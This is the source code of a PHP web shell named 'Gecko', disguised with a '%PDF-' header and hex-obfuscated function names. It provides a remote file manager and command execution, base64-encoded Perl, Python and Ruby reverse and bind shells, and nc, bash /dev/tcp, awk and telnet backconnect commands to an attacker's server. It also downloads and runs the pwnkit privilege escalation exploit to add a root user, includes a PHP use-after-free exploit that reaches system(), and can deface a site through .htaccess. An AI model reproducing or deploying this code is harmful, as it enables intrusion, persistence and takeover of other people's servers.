%PDF- 0 '676c6f62', # gl ob => 1 '69735f646972', # is_d ir => 2 '69735f66696c65', # is_ file => 3 '69735f7772697461626c65', # is_wr iteable => 4 '69735f7265616461626c65', # is_re adble => 5 '66696c657065726d73', # fileper ms => 6 '66696c65', # f ile => 7 '7068705f756e616d65', # php_unam e => 8 '6765745f63757272656e745f75736572', # getc urrentuser => 9 '68746d6c7370656369616c6368617273', # html special => 10 '66696c655f6765745f636f6e74656e7473', # fil e_get_contents => 11 '6d6b646972', # mk dir => 12 '746f756368', # to uch => 13 '6368646972', # ch dir => 14 '72656e616d65', # ren ame => 15 '65786563', # exe c => 16 '7061737374687275', # pas sthru => 17 '73797374656d', # syst em => 18 '7368656c6c5f65786563', # sh ell_exec => 19 '706f70656e', # p open => 20 '70636c6f7365', # pcl ose => 21 '73747265616d5f6765745f636f6e74656e7473', # stre amgetcontents => 22 '70726f635f6f70656e', # p roc_open => 23 '756e6c696e6b', # un link => 24 '726d646972', # rmd ir => 25 '666f70656e', # fop en => 26 '66636c6f7365', # fcl ose => 27 '66696c655f7075745f636f6e74656e7473', # file_put_c ontents => 28 '6d6f76655f75706c6f616465645f66696c65', # move_up loaded_file => 29 '63686d6f64', # ch mod => 30 '7379735f6765745f74656d705f646972', # temp _dir => 31 '70687076657273696f6e' # phpversion -> 32 ]; $hitung_array = count($Array); for ($i = 0; $i < $hitung_array; $i++) { $fungsi[] = unx($Array[$i]); } if (isset($_GET['d'])) { $cdir = unx($_GET['d']); $fungsi[14]($cdir); } else { $cdir = $fungsi[0](); } function download($file) { if (file_exists($file)) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename=' . basename($file)); header('Content-Transfer-Encoding: binary'); header('Expires: 0'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . filesize($file)); ob_clean(); flush(); readfile($file); exit; } } if ($_GET['don'] == true) { $FilesDon = download(unx($_GET['don'])); } /* konfigurasi */ /* Password using md5 hashes */ $password = "c7d2d8fedd98d6d73e06ce76fd410d29"; //mrmad123@A $default_action = "FilesMan"; $default_use_ajax = true; $default_charset = 'UTF-8'; date_default_timezone_set("Asia/Jakarta"); function login_shell() { ?>
 
Gecko [ <?= $_SERVER['SERVER_NAME']; ?> ]
$val) { if ($val == '' && $id == 0) { echo '  / '; continue; } if ($val == '') continue; echo '' . $val . ' / ' . ''; } echo "[ HOME SHELL ]"; ?>
Name Size Permission Action
  "> [ DIR ] '; } elseif (!$fungsi[5]($fungsi[0]() . '/' . $_D)) { echo ''; } echo perms($fungsi[0]() . '/' . $_D); ?>  
   '; } elseif (!is_readable($fungsi[0]() . '/' . $_F)) { echo ''; } echo perms($fungsi[0]() . '/' . $_F); ?>   

${this.title}

 

  Code Editor :

 
  •  TERMINAL
  • " autofocus>
  •  TERMINAL Bypasser 5second- Digicorp Security
  •  AUTO ROOT
  • " autofocus>

Rename :

 

Change Permission :

 
/dev/null 2>/dev/null &'); } else { failed(); } } if (isset($_POST['gecko-up-submit'])) { $namaFilenya = $_FILES['gecko-upload']['name']; $tmpName = $_FILES['gecko-upload']['tmp_name']; if ($fungsi[29]($tmpName, $fungsi[0]() . "/" . $namaFilenya)) { success(); } else { failed(); } } if ($_GET['logout'] == True) { session_destroy(); session_unset(); success(); } if (isset($_GET['destroy'])) { $DOC_ROOT = $_SERVER["\x44\x4f\x43\x55\x4d\x45\x4e\x54\x5f\x52\x4f\x4f\x54"]; $CurrentFile = trim(basename($_SERVER["\x53\x43\x52\x49\x50\x54\x5f\x46\x49\x4c\x45\x4e\x41\x4d\x45"])); if ($fungsi[4]($DOC_ROOT)) { $htaccess = ' Deny from all Allow from all Allow from all '; $put_htt = $fungsi[28]($DOC_ROOT . "/.htaccess", $htaccess); if ($put_htt) { success(); } else { failed(); } } else { failed(); } } if (isset($_POST['save-editor'])) { $save = $fungsi[28]($fungsi[0]() . "/" . unx($_GET['f']), $_POST['code-editor']); if ($save) { success(); } else { failed(); } } if (isset($_GET['adminer'])) { $URL = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x67\x69\x74\x68\x75\x62\x2e\x63\x6f\x6d\x2f\x76\x72\x61\x6e\x61\x2f\x61\x64\x6d\x69\x6e\x65\x72\x2f\x72\x65\x6c\x65\x61\x73\x65\x73\x2f\x64\x6f\x77\x6e\x6c\x6f\x61\x64\x2f\x76\x34\x2e\x38\x2e\x31\x2f\x61\x64\x6d\x69\x6e\x65\x72\x2d\x34\x2e\x38\x2e\x31\x2e\x70\x68\x70"; if (!$fungsi[3]('adminer.php')) { cmd('wget ' . $URL . ' -O adminer.php --quiet'); echo ''; } } if($_POST['bpl']){ $bp = base64_decode("IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="); $brt = @fopen('bp.pl','w'); fwrite($brt,$bp); $out = cmd("perl bp.pl ".$_POST['port']." 1>/dev/null 2>&1"); sleep(1); echo ".$out.".cmd("ps aux | grep bp.pl").""; unlink("bp.pl"); } if($_POST['backconnect'] == 'bash'){ $outbash = cmd("sh -i >& /dev/tcp/".$_POST['server']."/".$_POST['port']." 0>&1 &"); sleep(1); echo ".$outbash.".cmd("ps aux | grep /dev/tcp").""; } if($_POST['backconnect'] == 'nc1'){ $outbash = cmd("nc -e sh ".$_POST['server']." ".$_POST['port']." &"); sleep(1); echo "
$outbash".cmd("ps aux | grep nc")."
"; } if($_POST['backconnect'] == 'nc2'){ $outbash = cmd("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc ".$_POST['server']." ".$_POST['port']." >/tmp/f &"); sleep(1); echo "
$outbash".cmd("ps aux | grep nc")."
"; } if($_POST['backconnect'] == 'awk'){ $outbash = cmd("awk 'BEGIN {s = \"/inet/tcp/0/".$_POST['server']."/".$_POST['port']."\"; while(42) { do{ printf \"shell@digicorp:~#\" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != \"exit\") close(s); }}' &"); sleep(1); echo "
$outbash".cmd("ps aux | grep awk")."
"; } if($_POST['backconnect'] == 'telnet'){ $outbash = cmd("TF=$(mktemp -u);mkfifo $TF && telnet ".$_POST["server"]." ".$_POST["port"]." 0<$TF | sh 1>$TF"); sleep(1); echo "
$outbash".cmd("ps aux | grep telnet")."
"; } if($_POST['backconnect'] == 'perl'){ $bc = base64_decode("IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"); $plbc = @fopen('bc.pl','w'); fwrite($plbc,$bc); $out = cmd("perl bc.pl ".$_POST["server"]." ".$_POST["port"]." 1>/dev/null 2>&1 &"); sleep(1); echo "
$out".cmd("ps aux | grep bc.pl")."
"; unlink("bc.pl"); } if($_POST['backconnect'] == 'python'){ $becaa = base64_decode("IyEvdXNyL2Jpbi9weXRob24KI1VzYWdlOiBweXRob24gZmlsZW5hbWUucHkgSE9TVCBQT1JUCmltcG9ydCBzeXMsIHNvY2tldCwgb3MsIHN1YnByb2Nlc3MKaXBsbyA9IHN5cy5hcmd2WzFdCnBvcnRsbyA9IGludChzeXMuYXJndlsyXSkKc29ja2V0LnNldGRlZmF1bHR0aW1lb3V0KDYwKQpkZWYgcHliYWNrY29ubmVjdCgpOgogIHRyeToKICAgIGptYiA9IHNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsc29ja2V0LlNPQ0tfU1RSRUFNKQogICAgam1iLmNvbm5lY3QoKGlwbG8scG9ydGxvKSkKICAgIGptYi5zZW5kKCcnJ1xuUHl0aG9uIEJhY2tDb25uZWN0IEJ5IERpZ2ljb3JwUHJvamVjdFxuXG4nJycpCiAgICBvcy5kdXAyKGptYi5maWxlbm8oKSwwKQogICAgb3MuZHVwMihqbWIuZmlsZW5vKCksMSkKICAgIG9zLmR1cDIoam1iLmZpbGVubygpLDIpCiAgICBvcy5kdXAyKGptYi5maWxlbm8oKSwzKQogICAgc2hlbGwgPSBzdWJwcm9jZXNzLmNhbGwoWyIvYmluL3NoIiwiLWkiXSkKICBleGNlcHQgc29ja2V0LnRpbWVvdXQ6CiAgICBwcmludCAiVGltT3V0IgogIGV4Y2VwdCBzb2NrZXQuZXJyb3IsIGU6CiAgICBwcmludCAiRXJyb3IiLCBlCnB5YmFja2Nvbm5lY3QoKQ=="); $pbcaa = @fopen('bcpyt.py','w'); fwrite($pbcaa,$becaa); $out1 = cmd("python bcpyt.py ".$_POST["server"]." ".$_POST["port"]); sleep(1); echo "
$out1".cmd("ps aux | grep bcpyt.py")."
"; unlink("bcpyt.py"); } if($_POST['backconnect'] == 'ruby'){ $becaak = base64_decode("IyEvdXNyL2Jpbi9lbnYgcnVieQ0KIyBkZXZpbHpjMGRlLm9yZyAoYykgMjAxMg0KIw0KIyBiaW5kIGFuZCByZXZlcnNlIHNoZWxsDQojIGIzNzRrDQpyZXF1aXJlICdzb2NrZXQnDQpyZXF1aXJlICdwYXRobmFtZScNCg0KZGVmIHVzYWdlDQoJcHJpbnQgImJpbmQgOlxyXG4gIHJ1YnkgIiArIEZpbGUuYmFzZW5hbWUoX19GSUxFX18pICsgIiBbcG9ydF1cclxuIg0KCXByaW50ICJyZXZlcnNlIDpcclxuICBydWJ5ICIgKyBGaWxlLmJhc2VuYW1lKF9fRklMRV9fKSArICIgW3BvcnRdIFtob3N0XVxyXG4iDQplbmQNCg0KZGVmIHN1Y2tzDQoJc3Vja3MgPSBmYWxzZQ0KCWlmIFJVQllfUExBVEZPUk0uZG93bmNhc2UubWF0Y2goJ21zd2lufHdpbnxtaW5ndycpDQoJCXN1Y2tzID0gdHJ1ZQ0KCWVuZA0KCXJldHVybiBzdWNrcw0KZW5kDQoNCmRlZiByZWFscGF0aChzdHIpDQoJcmVhbCA9IHN0cg0KCWlmIEZpbGUuZXhpc3RzPyhzdHIpDQoJCWQgPSBQYXRobmFtZS5uZXcoc3RyKQ0KCQlyZWFsID0gZC5yZWFscGF0aC50b19zDQoJZW5kDQoJaWYgc3Vja3MNCgkJcmVhbCA9IHJlYWwuZ3N1YigvXC8vLCJcXCIpDQoJZW5kDQoJcmV0dXJuIHJlYWwNCmVuZA0KDQppZiBBUkdWLmxlbmd0aCA9PSAxDQoJaWYgQVJHVlswXSA9fiAvXlswLTldezEsNX0kLw0KCQlwb3J0ID0gSW50ZWdlcihBUkdWWzBdKQ0KCWVsc2UNCgkJdXNhZ2UNCgkJcHJpbnQgIlxyXG4qKiogZXJyb3IgOiBQbGVhc2UgaW5wdXQgYSB2YWxpZCBwb3J0XHJcbiINCgkJZXhpdA0KCWVuZA0KCXNlcnZlciA9IFRDUFNlcnZlci5uZXcoIiIsIHBvcnQpDQoJcyA9IHNlcnZlci5hY2NlcHQNCglwb3J0ID0gcy5wZWVyYWRkclsxXQ0KCW5hbWUgPSBzLnBlZXJhZGRyWzJdDQoJcy5wcmludCAiKioqIGNvbm5lY3RlZFxyXG4iDQoJcHV0cyAiKioqIGNvbm5lY3RlZCA6ICN7bmFtZX06I3twb3J0fVxyXG4iDQoJYmVnaW4NCgkJaWYgbm90IHN1Y2tzDQoJCQlmID0gcy50b19pDQoJCQlleGVjIHNwcmludGYoIi9iaW4vc2ggLWkgXDxcJiVkIFw+XCYlZCAyXD5cJiVkIixmLGYsZikNCgkJZWxzZQ0KCQkJcy5wcmludCAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4iDQoJCQl3aGlsZSBsaW5lID0gcy5nZXRzDQoJCQkJcmFpc2UgZXJyb3JCcm8gaWYgbGluZSA9fiAvXmRpZVxyPyQvDQoJCQkJaWYgbm90IGxpbmUuY2hvbXAgPT0gIiINCgkJCQkJaWYgbGluZSA9fiAvY2QgLiovaQ0KCQkJCQkJbGluZSA9IGxpbmUuZ3N1YigvY2QgL2ksICcnKS5jaG9tcA0KCQkJCQkJaWYgRmlsZS5kaXJlY3Rvcnk/KGxpbmUpDQoJCQkJCQkJbGluZSA9IHJlYWxwYXRoKGxpbmUpDQoJCQkJCQkJRGlyLmNoZGlyKGxpbmUpDQoJCQkJCQllbmQNCgkJCQkJCXMucHJpbnQgIlxyXG4iICsgcmVhbHBhdGgoIi4iKSArICI+Ig0KCQkJCQllbHNpZiBsaW5lID1+IC9cdzouKi9pDQoJCQkJCQlpZiBGaWxlLmRpcmVjdG9yeT8obGluZS5jaG9tcCkNCgkJCQkJCQlEaXIuY2hkaXIobGluZS5jaG9tcCkNCgkJCQkJCWVuZA0KCQkJCQkJcy5wcmludCAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4iDQoJCQkJCWVsc2UNCgkJCQkJCUlPLnBvcGVuKGxpbmUsInIiKXt8aW98cy5wcmludCBpby5yZWFkICsgIlxyXG4iICsgcmVhbHBhdGgoIi4iKSArICI+In0NCgkJCQkJZW5kDQoJCQkJZW5kDQoJCQllbmQNCgkJZW5kDQoJcmVzY3VlIGVycm9yQnJvDQoJCXB1dHMgIioqKiAje25hbWV9OiN7cG9ydH0gZGlzY29ubmVjdGVkIg0KCWVuc3VyZQ0KCQlzLmNsb3NlDQoJCXMgPSBuaWwNCgllbmQNCmVsc2lmIEFSR1YubGVuZ3RoID09IDINCglpZiBBUkdWWzBdID1+IC9eWzAtOV17MSw1fSQvDQoJCXBvcnQgPSBJbnRlZ2VyKEFSR1ZbMF0pDQoJCWhvc3QgPSBBUkdWWzFdDQoJZWxzaWYgQVJHVlsxXSA9fiAvXlswLTldezEsNX0kLw0KCQlwb3J0ID0gSW50ZWdlcihBUkdWWzFdKQ0KCQlob3N0ID0gQVJHVlswXQ0KCWVsc2UNCgkJdXNhZ2UNCgkJcHJpbnQgIlxyXG4qKiogZXJyb3IgOiBQbGVhc2UgaW5wdXQgYSB2YWxpZCBwb3J0XHJcbiINCgkJZXhpdA0KCWVuZA0KCXMgPSBUQ1BTb2NrZXQubmV3KCIje2hvc3R9IiwgcG9ydCkNCglwb3J0ID0gcy5wZWVyYWRkclsxXQ0KCW5hbWUgPSBzLnBlZXJhZGRyWzJdDQoJcy5wcmludCAiKioqIGNvbm5lY3RlZFxyXG4iDQoJcHV0cyAiKioqIGNvbm5lY3RlZCA6ICN7bmFtZX06I3twb3J0fSINCgliZWdpbg0KCQlpZiBub3Qgc3Vja3MNCgkJCWYgPSBzLnRvX2kNCgkJCWV4ZWMgc3ByaW50ZigiL2Jpbi9zaCAtaSBcPFwmJWQgXD5cJiVkIDJcPlwmJWQiLCBmLCBmLCBmKQ0KCQllbHNlDQoJCQlzLnByaW50ICJcclxuIiArIHJlYWxwYXRoKCIuIikgKyAiPiINCgkJCXdoaWxlIGxpbmUgPSBzLmdldHMNCgkJCQlyYWlzZSBlcnJvckJybyBpZiBsaW5lID1+IC9eZGllXHI/JC8NCgkJCQlpZiBub3QgbGluZS5jaG9tcCA9PSAiIg0KCQkJCQlpZiBsaW5lID1+IC9jZCAuKi9pDQoJCQkJCQlsaW5lID0gbGluZS5nc3ViKC9jZCAvaSwgJycpLmNob21wDQoJCQkJCQlpZiBGaWxlLmRpcmVjdG9yeT8obGluZSkNCgkJCQkJCQlsaW5lID0gcmVhbHBhdGgobGluZSkNCgkJCQkJCQlEaXIuY2hkaXIobGluZSkNCgkJCQkJCWVuZA0KCQkJCQkJcy5wcmludCAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4iDQoJCQkJCWVsc2lmIGxpbmUgPX4gL1x3Oi4qL2kNCgkJCQkJCWlmIEZpbGUuZGlyZWN0b3J5PyhsaW5lLmNob21wKQ0KCQkJCQkJCURpci5jaGRpcihsaW5lLmNob21wKQ0KCQkJCQkJZW5kDQoJCQkJCQlzLnByaW50ICJcclxuIiArIHJlYWxwYXRoKCIuIikgKyAiPiINCgkJCQkJZWxzZQ0KCQkJCQkJSU8ucG9wZW4obGluZSwiciIpe3xpb3xzLnByaW50IGlvLnJlYWQgKyAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4ifQ0KCQkJCQllbmQNCgkJCQllbmQNCgkJCWVuZA0KCQllbmQNCglyZXNjdWUgZXJyb3JCcm8NCgkJcHV0cyAiKioqICN7bmFtZX06I3twb3J0fSBkaXNjb25uZWN0ZWQiDQoJZW5zdXJlDQoJCXMuY2xvc2UNCgkJcyA9IG5pbA0KCWVuZA0KZWxzZQ0KCXVzYWdlDQoJZXhpdA0KZW5k"); $pbcaak = @fopen('bcruby.rb','w'); fwrite($pbcaak,$becaak); $out2 = cmd("ruby bcruby.rb ".$_POST['server']." ".$_POST['port']); sleep(1); echo "
$out2".cmd("ps aux | grep bcruby.rb")."
"; unlink("bcruby.rb"); } if($_POST['backconnect'] == 'php'){ $ip = $_POST['server']; $port = $_POST['port']; $sockfd = fsockopen($ip , $port , $errno, $errstr ); if($errno != 0){ echo "$errno : $errstr"; }else if (!$sockfd){ $result = "

Unexpected error has occured, connection may have failed.

"; }else{ fputs ($sockfd ," n<================================================> n Backconnect php exec by digicorp project n<================================================>n"); $dir = @shell_exec("pwd"); $sysinfo = @shell_exec("uname -a"); $time = @Shell_exec("time"); $len = 1337; fputs($sockfd, "User ", $sysinfo, "connected @ ", $time, "nn"); while(!feof($sockfd)){ $cmdPrompt = 'r00t@digicorp:~# '; @fputs ($sockfd , $cmdPrompt ); $command= fgets($sockfd, $len); @fputs($sockfd , "n" . @shell_exec($command) . "nn"); } @fclose($sockfd); } } if ($_GET['terminal'] == "root") { if (!$fungsi[3]('pwnkit')) { cmd('wget https://github.com/MadExploits/Privelege-escalation/raw/main/pwnkit -O pwnkit'); cmd('chmod +x pwnkit'); echo cmd('./pwnkit id > .mad-root'); echo ''; } } if (isset($_POST['submit-action'])) { $items = $_POST['check']; if ($_POST['gecko-select'] == "delete") { foreach ($items as $it) { $repl = str_replace("\\", "/", $fungsi[0]()); // Untuk Windows Path $fd = $repl . "/" . $it; if (is_dir($fd) || is_file($fd)) { $rmdir = unlinkDir($fd); $rmfile = $fungsi[24]($fd); if ($rmdir || $rmfile) { success(); } else { failed(); } } } } } if (isset($_POST['submit'])) { if ($_POST['create_folder'] == true) { $NamaFolder = $fungsi[12]($_POST['create_folder']); if ($NamaFolder) { success(); } else { failed(); } } else if ($_POST['create_file'] == true) { $namaFile = $fungsi[13]($_POST['create_file']); if ($namaFile) { success(); } else { failed(); } } else if ($_POST['renameFile'] == true) { $renameFile = $fungsi[15](unx($_GET['re']), $_POST['renameFile']); if ($renameFile) { success(); } else { failed(); } } else if ($_POST['chFile']) { $chFiles = $fungsi[30](unx($_GET['ch']), $_POST['chFile']); if ($chFiles) { success(); } else { failed(); } } else if (isset($_POST['path-glob']) && isset($_POST['path-shell'])) { $directories = glob($somePath . $_POST['path-glob'].'/*/*/' , GLOB_ONLYDIR); echo '
  •  BYPASS Copy File - Digicorp Security
'; }else if (isset($_POST['path-fil']) && isset($_POST['path-shells'])){ echo '
  •  BYPASS Copy Files - Digicorp Security
'; } else if (isset($_POST['add-username']) && isset($_POST['add-password'])) { if (!$fungsi[3]('pwnkit')) { cmd('wget https://github.com/MadExploits/Privelege-escalation/raw/main/pwnkit -O pwnkit'); cmd('chmod +x pwnkit'); cmd('./pwnkit "id" > .mad-root'); echo ''; } else if ($fungsi[3]('.mad-root')) { $response = $fungsi[11]('.mad-root'); $r_text = explode(" ", $response); if ($r_text[0] == "uid=0(root)") { $username = $_POST['add-username']; $password = $_POST['add-password']; cmd('./pwnkit "useradd ' . $username . ' ; echo -e "' . $password . '\n' . $password . '" | passwd ' . $username . '"'); } else { echo ''; } } } else if ($_POST['lockfile'] == true) { $flesName = $_POST['lockfile']; $TmpNames = $fungsi[31](); if (file_exists($TmpNames . '/.sessions/.' . base64_encode($fungsi[0]() . remove_dot($flesName) . '-handler')) && file_exists($TmpNames . '/.sessions/.' . remove_dot($flesName) . '-text')) { cmd('rm -rf ' . $TmpNames . '/.sessions/.' . base64_encode($fungsi[0]() . remove_dot($flesName) . '-text-file')); cmd('rm -rf ' . $TmpNames . '/.sessions/.' . base64_encode($fungsi[0]() . remove_dot($flesName) . '-handler')); } mkdir($TmpNames . "/.sessions"); cmd("cp $flesName " . $TmpNames . "/.sessions/." . base64_encode($fungsi[0]() . remove_dot($flesName) . '-text-file')); chmod($flesName, 0444); $handler = ' /dev/null 2>/dev/null &'); } else { failed(); } } else if ($_POST['lock-windows'] == True) { $NameWin = $_POST['lock-windows']; $tmpPath = str_replace("\\", "/", $fungsi[31]()); if (strstr($fungsi[8](), "NT")) { // Menghapus file if (file_exists($tmpPath . '/.sessions/.' . remove_slash(winpwd() . $NameWin) . 'text') && file_exists($tmpPath . "/.sessions/." . remove_slash(winpwd() . $NameWin) . "handler")) { unlink($tmpPath . '/.sessions/.' . remove_slash(winpwd() . $NameWin) . 'text'); unlink($tmpPath . "/.sessions/." . remove_slash(winpwd() . $NameWin) . "handler"); } // Membuat File mkdir($tmpPath . "/.sessions"); copy($NameWin, $tmpPath . "/.sessions/." . remove_slash(winpwd() . $NameWin) . "text"); $putcontent = $fungsi[28]($tmpPath . "/.sessions/." . remove_slash(winpwd() . $NameWin) . "handler", ' '; } function failed() { echo ''; } function formatSize($bytes) { $types = array('B', 'KB', 'MB', 'GB', 'TB'); for ($i = 0; $bytes >= 1024 && $i < (count($types) - 1); $bytes /= 1024, $i++); return (round($bytes, 2) . " " . $types[$i]); } function hx($n) { $y = ''; for ($i = 0; $i < strlen($n); $i++) { $y .= dechex(ord($n[$i])); } return $y; } function unx($y) { $n = ''; for ($i = 0; $i < strlen($y) - 1; $i += 2) { $n .= chr(hexdec($y[$i] . $y[$i + 1])); } return $n; } function suggest_exploit() { $uname = $GLOBALS['fungsi'][8](); $xplod = explode(" ", $uname); $xpld = explode("-", $xplod[2]); $pl = explode(".", $xpld[0]); return $pl[0] . "." . $pl[1] . "." . $pl[2]; } function s() { $d0mains = @$GLOBALS['fungsi'][7]("/etc/named.conf", false); if (!$d0mains) { $dom = "Cant Read [ /etc/named.conf ]"; $GLOBALS["need_to_update_header"] = "true"; } else { $count = 0; foreach ($d0mains as $d0main) { if (@strstr($d0main, "zone")) { preg_match_all('#zone "(.*)"#', $d0main, $domains); flush(); if (strlen(trim($domains[1][0])) > 2) { flush(); $count++; } } } $dom = "$count Domain"; } return $dom; } function pwn($cmd) { global $abc, $helper, $backtrace; class Vuln { public $a; public function __destruct() { global $backtrace; unset($this->a); $backtrace = (new Exception)->getTrace(); # ;) if(!isset($backtrace[1]['args'])) { # PHP >= 7.4 $backtrace = debug_backtrace(); } } } class Helper { public $a, $b, $c, $d; } function str2ptr(&$str, $p = 0, $s = 8) { $address = 0; for($j = $s-1; $j >= 0; $j--) { $address <<= 8; $address |= ord($str[$p+$j]); } return $address; } function ptr2str($ptr, $m = 8) { $out = ""; for ($i=0; $i < $m; $i++) { $out .= chr($ptr & 0xff); $ptr >>= 8; } return $out; } function write(&$str, $p, $v, $n = 8) { $i = 0; for($i = 0; $i < $n; $i++) { $str[$p + $i] = chr($v & 0xff); $v >>= 8; } } function leak($addr, $p = 0, $s = 8) { global $abc, $helper; write($abc, 0x68, $addr + $p - 0x10); $leak = strlen($helper->a); if($s != 8) { $leak %= 2 << ($s * 8) - 1; } return $leak; } function parse_elf($base) { $e_type = leak($base, 0x10, 2); $e_phoff = leak($base, 0x20); $e_phentsize = leak($base, 0x36, 2); $e_phnum = leak($base, 0x38, 2); for($i = 0; $i < $e_phnum; $i++) { $header = $base + $e_phoff + $i * $e_phentsize; $p_type = leak($header, 0, 4); $p_flags = leak($header, 4, 4); $p_vaddr = leak($header, 0x10); $p_memsz = leak($header, 0x28); if($p_type == 1 && $p_flags == 6) { # PT_LOAD, PF_Read_Write # handle pie $data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr; $data_size = $p_memsz; } else if($p_type == 1 && $p_flags == 5) { # PT_LOAD, PF_Read_exec $text_size = $p_memsz; } } if(!$data_addr || !$text_size || !$data_size) return false; return [$data_addr, $text_size, $data_size]; } function get_basic_funcs($base, $elf) { list($data_addr, $text_size, $data_size) = $elf; for($i = 0; $i < $data_size / 8; $i++) { $leak = leak($data_addr, $i * 8); if($leak - $base > 0 && $leak - $base < $data_addr - $base) { $deref = leak($leak); # 'constant' constant check if($deref != 0x746e6174736e6f63) continue; } else continue; $leak = leak($data_addr, ($i + 4) * 8); if($leak - $base > 0 && $leak - $base < $data_addr - $base) { $deref = leak($leak); # 'bin2hex' constant check if($deref != 0x786568326e6962) continue; } else continue; return $data_addr + $i * 8; } } function get_binary_base($binary_leak) { $base = 0; $start = $binary_leak & 0xfffffffffffff000; for($i = 0; $i < 0x1000; $i++) { $addr = $start - 0x1000 * $i; $leak = leak($addr, 0, 7); if($leak == 0x10102464c457f) { # ELF header return $addr; } } } function get_system($basic_funcs) { $addr = $basic_funcs; do { $f_entry = leak($addr); $f_name = leak($f_entry, 0, 6); if($f_name == 0x6d6574737973) { # system return leak($addr + 8); } $addr += 0x20; } while($f_entry != 0); return false; } function trigger_uaf($arg) { # str_shuffle prevents opcache string interning $arg = str_shuffle(str_repeat('A', 79)); $vuln = new Vuln(); $vuln->a = $arg; } if(stristr(PHP_OS, 'WIN')) { die('This PoC is for *nix systems only.'); } $n_alloc = 10; # increase this value if UAF fails $contiguous = []; for($i = 0; $i < $n_alloc; $i++) $contiguous[] = str_shuffle(str_repeat('A', 79)); trigger_uaf('x'); $abc = $backtrace[1]['args'][0]; $helper = new Helper; $helper->b = function ($x) { }; if(strlen($abc) == 79 || strlen($abc) == 0) { die("UAF failed"); } # leaks $closure_handlers = str2ptr($abc, 0); $php_heap = str2ptr($abc, 0x58); $abc_addr = $php_heap - 0xc8; # fake value write($abc, 0x60, 2); write($abc, 0x70, 6); # fake reference write($abc, 0x10, $abc_addr + 0x60); write($abc, 0x18, 0xa); $closure_obj = str2ptr($abc, 0x20); $binary_leak = leak($closure_handlers, 8); if(!($base = get_binary_base($binary_leak))) { die("Couldn't determine binary base address"); } if(!($elf = parse_elf($base))) { die("Couldn't parse ELF header"); } if(!($basic_funcs = get_basic_funcs($base, $elf))) { die("Couldn't get basic_functions address"); } if(!($zif_system = get_system($basic_funcs))) { die("Couldn't get zif_system address"); } # fake closure object $fake_obj_offset = 0xd0; for($i = 0; $i < 0x110; $i += 8) { write($abc, $fake_obj_offset + $i, leak($closure_obj, $i)); } # pwn write($abc, 0x20, $abc_addr + $fake_obj_offset); write($abc, 0xd0 + 0x38, 1, 4); # internal func type write($abc, 0xd0 + 0x68, $zif_system); # internal func handler ($helper->b)($cmd); exit(); } function cmd($in, $re = false) { $out = ''; try { if ($re) $in = $in . " 2>&1"; if (function_exists("\x65\x78\x65\x63")) { @$GLOBALS['fungsi'][16]($in, $out); $out = @join("\n", $out); } elseif (function_exists("\x70\x61\x73\x73\x74\x68\x72\x75")) { ob_start(); @$GLOBALS['fungsi'][17]($in); $out = ob_get_clean(); } elseif (function_exists("\x73\x79\x73\x74\x65\x6d")) { ob_start(); @$GLOBALS['fungsi'][18]($in); $out = ob_get_clean(); } elseif (function_exists("\x73\x68\x65\x6c\x6c\x5f\x65\x78\x65\x63")) { $out = $GLOBALS['fungsi'][19]($in); } elseif (function_exists("\x70\x6f\x70\x65\x6e") && function_exists("\x70\x63\x6c\x6f\x73\x65")) { if (is_resource($f = @$GLOBALS['fungsi'][20]($in, "r"))) { $out = ""; while (!@feof($f)) $out .= 